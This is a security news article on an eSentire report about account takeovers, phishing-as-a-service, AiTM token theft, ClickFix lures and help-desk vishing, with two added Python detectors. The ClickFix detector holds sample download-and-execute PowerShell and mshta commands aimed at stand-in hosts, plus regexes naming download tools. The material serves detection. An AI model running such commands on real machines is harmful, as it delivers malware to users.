The Identity Epidemic: eSentire Reports a 389% Surge in Account Takeovers
To get into a corporate network, attackers are increasingly skipping the hunt for server vulnerabilities and the effort of building complex exploits. It is cheaper and quieter to steal a person's credentials and walk in through the front door. According to the eSentire TRU report, digital identity became the primary target of attacks in 2025, and cybercrime increasingly resembles a legitimate industry, with turn-key services and transparent pricing.
The engine behind this industrialization is the spread of Phishing-as-a-Service (PhaaS) platforms, which sell a complete phishing infrastructure on subscription. The report says that for $200–$300 a month, a novice attacker gets a service that bypasses multi-factor authentication, intercepts session tokens in real time, and hands compromised accounts to whoever is ready to monetize them quickly.
The scale of the shift is plain in the TRU numbers. Account compromise made up half of everything the team observed, a 389% increase over 2024. The authors put it bluntly: why break in when you can log in? At the same time, abuse of remote administration tools is growing: misuse of Remote Monitoring and Management (RMM) software rose 143% year over year.
The researchers also note that compromises increasingly start with email. The share of incidents in which initial access came through email grew from 36.9% in 2024 to 54.8% in 2025, and 63% of all account takeovers were tied directly to PhaaS operations. These kits typically use an Adversary-in-the-Middle (AiTM) approach: the victim is sent to a proxy login page that relays the real sign-in flow, so the kit captures not only the password but also the session token issued once authentication completes. Because that token is minted after MFA has been satisfied, replaying it gives the attacker a working session without a second factor.
The speed of these intrusions is the unpleasant new normal. In an analysis of 100 incidents involving the Tycoon2FA platform, attackers began exploiting a stolen credential an average of fourteen minutes after the theft. In practice, the gap between a user typing a password and an intruder changing that user's mailbox forwarding rules can be shorter than a routine team meeting.
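The two signals described above, a stolen session token replayed from the attacker's own network and an external forwarding rule created minutes after login, are detectable in the identity and mailbox telemetry most tenants already collect. The following is an added example written for this article, not code from eSentire or from the report; the pipe-delimited log formats, the field names, and every sample record are constructed assumptions modelled loosely on IdP sign-in and Exchange mailbox-audit events.

```python
"""Flag AiTM session-token replay and fast external forwarding rules.

Added example, not from the eSentire report. Log formats are an assumption:
pipe-delimited fields modelled loosely on IdP sign-in and mailbox-audit
records. Every sample line below is constructed.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sign-in records: time|user|session_id|source_ip|asn|user_agent|interactive|auth
SIGNIN_LOG = """\
2025-03-04T09:12:03Z|alice@example.com|sess-7f3a|203.0.113.10|AS64500|Chrome/122 Windows|interactive|mfa
2025-03-04T09:19:41Z|alice@example.com|sess-7f3a|198.51.100.7|AS64511|Chrome/109 Linux|noninteractive|none
2025-03-04T10:02:15Z|bob@example.com|sess-c21d|203.0.113.22|AS64500|Edge/122 Windows|interactive|mfa
2025-03-04T10:40:00Z|bob@example.com|sess-c21d|203.0.113.22|AS64500|Edge/122 Windows|noninteractive|none
"""

# Constructed mailbox-audit records: time|user|session_id|operation|forward_to (empty if none)
AUDIT_LOG = """\
2025-03-04T09:26:12Z|alice@example.com|sess-7f3a|New-InboxRule|drop@attacker-mail.invalid
2025-03-04T11:15:30Z|bob@example.com|sess-c21d|New-InboxRule|
"""

INTERNAL_DOMAINS = {"example.com"}  # assumption: the tenant's own mail domains
FORWARDING_OPS = {"New-InboxRule", "Set-InboxRule", "Set-Mailbox"}


@dataclass(frozen=True)
class SignIn:
    ts: datetime
    user: str
    session: str
    ip: str
    asn: str
    user_agent: str
    interactive: bool
    mfa: bool


@dataclass(frozen=True)
class MailboxEvent:
    ts: datetime
    user: str
    session: str
    operation: str
    forward_to: str


def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def parse_signins(text: str) -> list[SignIn]:
    rows = []
    for line in text.splitlines():
        ts, user, sess, ip, asn, ua, kind, auth = line.split("|")
        rows.append(SignIn(_ts(ts), user, sess, ip, asn, ua, kind == "interactive", auth == "mfa"))
    return sorted(rows, key=lambda r: r.ts)


def parse_audit(text: str) -> list[MailboxEvent]:
    rows = []
    for line in text.splitlines():
        ts, user, sess, op, fwd = line.split("|")
        rows.append(MailboxEvent(_ts(ts), user, sess, op, fwd))
    return sorted(rows, key=lambda r: r.ts)


def detect(signins, events, window=timedelta(minutes=30)) -> list[dict]:
    """Return alerts; each names the session that should be revoked."""
    alerts = []
    # Anchor each session on the interactive sign-in that satisfied MFA. In an
    # AiTM flow that sign-in arrives via the phishing proxy; the captured
    # cookie is then replayed from the attacker's own infrastructure.
    anchor = {}
    for s in signins:
        if s.interactive and s.mfa:
            anchor.setdefault(s.session, s)

    # Rule 1: same session token, different network, no fresh MFA challenge.
    # ASN rather than raw IP, so a mobile user hopping addresses inside one
    # carrier does not trip the rule.
    for s in signins:
        a = anchor.get(s.session)
        if a is None or s == a:
            continue
        if s.asn != a.asn and not s.mfa:
            alerts.append({
                "rule": "session_token_replay", "user": s.user, "session": s.session,
                "seconds_after_login": int((s.ts - a.ts).total_seconds()),
                "detail": f"{a.asn} -> {s.asn}; UA {a.user_agent!r} -> {s.user_agent!r}",
                "action": f"revoke session {s.session} and reset credentials for {s.user}",
            })

    # Rule 2: a rule forwarding mail to an external domain, created within
    # `window` of the session being established (the classic post-takeover step).
    for e in events:
        if e.operation not in FORWARDING_OPS or not e.forward_to:
            continue
        if e.forward_to.rsplit("@", 1)[-1].lower() in INTERNAL_DOMAINS:
            continue
        a = anchor.get(e.session)
        if a is not None and e.ts - a.ts > window:
            continue  # older session: still worth review, but not "fast" by this rule
        alerts.append({
            "rule": "fast_external_forwarding", "user": e.user, "session": e.session,
            "seconds_after_login": int((e.ts - a.ts).total_seconds()) if a else None,
            "detail": f"{e.operation} forwarding to {e.forward_to}",
            "action": f"remove the rule and revoke session {e.session}",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_signins(SIGNIN_LOG), parse_audit(AUDIT_LOG)):
        print(alert)
```

On the constructed data, alice's session is flagged twice: the cookie is reused from a different ASN and user agent 458 seconds after the MFA sign-in, and an external forwarding rule appears 849 seconds after it, close to the fourteen-minute figure in the report. Bob's non-interactive reuse from the same network and his non-forwarding rule produce nothing. The `action` field is where a response playbook would call the identity provider's session-revocation API rather than waiting for a human to read the alert.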
At the same time, attacks that trick the user into running malicious code by hand are on the rise. The best-known example is ClickFix (also called FakeCaptcha). The report says ClickFix incidents grew from 7.8% to 30.7% of all malware delivery cases in 2025, a rise of nearly 300% year over year, with researchers documenting more than 65 distinct intrusion chains that use the technique. The lure is usually a fake CAPTCHA or a fake browser error that tells the victim to click "Fix It", copy a command, and run it in the Windows Run dialog or in PowerShell.
Another growing trend borrows from fraudulent call centers but ends in a technical breach. Email bombing combined with "IT support" vishing grew fourteen-fold year over year, the fastest-growing threat category in the report. First the victim's inbox is flooded with spam; then an actor contacts them over Microsoft Teams posing as the help desk. Under the pretext of cleaning up the mess, the caller obtains remote access. In some cases this chain ended with the deployment of Black Basta ransomware, and the report estimates the vishing success rate at an alarming 72%.
The authors' conclusion is blunt: modern attacks move faster than traditional defenses. Organizations that rely on after-the-fact log review, or that staff security only during business hours, start at a disadvantage. The emphasis is therefore shifting to continuous identity monitoring and fast response to anomalous behavior. When intruders "simply walk in", the height of the perimeter wall matters less than how quickly an illegitimate session can be spotted and revoked.
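Because the victim pastes the ClickFix command into the Run dialog or a console, it surfaces in endpoint telemetry as a script host spawned directly by explorer.exe with a download-and-execute command line, sometimes base64-encoded and sometimes decorated with a reassuring "I am not a robot" comment. The scorer below is an added example written for this article, not code from eSentire or from the report; the event fields are an assumption modelled on Sysmon process-creation records, and every sample event is constructed.

```python
"""Score process-creation events for the ClickFix pattern.

Added example, not from the eSentire report. Event fields are an assumption
modelled on Sysmon Event ID 1 (parent image, image, command line). All sample
events are constructed.
"""
import base64
import re
from dataclasses import dataclass

# A Win+R (Run dialog) command runs as a child of explorer.exe, so a script
# host started directly by explorer is the first thing to look at.
INTERACTIVE_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

INDICATORS = {
    "remote_fetch": re.compile(
        r"\b(iwr|invoke-webrequest|invoke-restmethod|curl|wget|downloadstring|downloadfile|bitsadmin)\b", re.I),
    "in_memory_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "mshta_url": re.compile(r'\bmshta(?:\.exe)?\s+"?https?://', re.I),
    # Lure text the kit appends so the Run dialog looks like a CAPTCHA step.
    "captcha_lure": re.compile(r"not a robot|captcha|verification id", re.I),
}
STRONG = {"mshta_url", "in_memory_exec"}  # enough on their own to alert
ENCODED_RX = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


@dataclass(frozen=True)
class ProcEvent:
    ts: str
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def expand_encoded(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) if present."""
    m = ENCODED_RX.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return f"{cmdline} [decoded: {decoded}]"


def score_event(ev: ProcEvent) -> list[str]:
    """Indicator names that fire for one event; empty unless explorer -> script host."""
    if _basename(ev.parent_image) not in INTERACTIVE_PARENTS or _basename(ev.image) not in SCRIPT_HOSTS:
        return []
    text = expand_encoded(ev.command_line)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def detect_clickfix(events) -> list[dict]:
    alerts = []
    for ev in events:
        hits = score_event(ev)
        if len(hits) >= 2 or STRONG & set(hits):
            alerts.append({"ts": ev.ts, "image": _basename(ev.image), "indicators": hits})
    return alerts


# Constructed sample telemetry. The third event's payload is encoded here so
# the decode path is exercised; the last two are benign or non-interactive.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
_ENC = base64.b64encode("iwr http://cdn-update.invalid/p.ps1 | iex".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    ProcEvent("2025-03-04T09:41:07Z", EXPLORER, PS,
              'powershell -w hidden -c "iwr https://captcha-check.invalid/v.txt | iex" '
              '# "I am not a robot - reCAPTCHA Verification ID: 7342"'),
    ProcEvent("2025-03-04T09:58:22Z", EXPLORER, r"C:\Windows\System32\mshta.exe",
              "mshta https://verify-human.invalid/check.hta"),
    ProcEvent("2025-03-04T10:13:51Z", EXPLORER, PS, f"powershell -nop -w hidden -enc {_ENC}"),
    ProcEvent("2025-03-04T10:30:00Z", EXPLORER, PS,
              'powershell -NoExit -Command "Get-Process | Sort-Object CPU -Descending"'),
    ProcEvent("2025-03-04T10:45:00Z", r"C:\Windows\System32\svchost.exe", PS,
              'powershell -w hidden -c "iwr https://updates.example.com/agent.ps1 | iex"'),
]

if __name__ == "__main__":
    for alert in detect_clickfix(SAMPLE_EVENTS):
        print(alert)
```

The first three constructed events are flagged (the encoded one only because the payload is decoded before matching); the interactive Get-Process command and the svchost-launched script are not. The parent-process filter is deliberate: the same download cradle under a service or scheduled-task parent is a different hunt. On a host already suspected, the Run-dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU often still holds the pasted command and is worth collecting before the user clears it.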